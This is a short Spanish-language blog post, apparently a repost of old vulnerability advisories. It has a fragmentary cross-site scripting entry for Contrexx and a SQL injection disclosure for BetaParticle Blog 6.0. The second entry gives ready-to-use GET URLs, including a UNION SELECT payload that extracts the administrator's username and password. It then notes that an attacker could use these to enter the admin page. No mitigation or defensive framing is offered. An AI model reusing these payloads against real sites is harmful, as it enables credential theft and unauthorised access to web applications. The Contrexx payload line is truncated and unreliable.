Vulnerabilidades....
Sitio :
http://www.contrexx.com
Bug :
http://victim/path/index.php/">
Vulnerable :
All Version ( => v1.0.8 )
Credit :
Soot
Shabgard Security Team
---------------------------------------------------------------------------------------
BetaParticle Blog <= 6.0 Multiple Remote SQL Injection
Vulnerabilities
Vendedor: BetaParticle (http://www.betaparticle.com/)
Version: 6.0
Ejemplo:
GET -> http://[sitio]/bpdir/template_permalink.asp?id=[SQLQuery]
GET -> http://[sitio]/bpdir/template_gallery_detail.asp?fldGalleryID=[SQLQuery]
Ejemplo:
http://[sitio]/bpdir/template_gallery_detail.asp?fldGalleryID=-1+UNION+SELECT+null,fldAuthorUsername
,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1
Con este ejemplo un atacante remoto podría obtener el pass de la administración y realizar la entrada de /main.asp
Salu2
publicado por Mousehack a las 4:34 p. m.
0 Comments:
Publicar un comentario
<< Home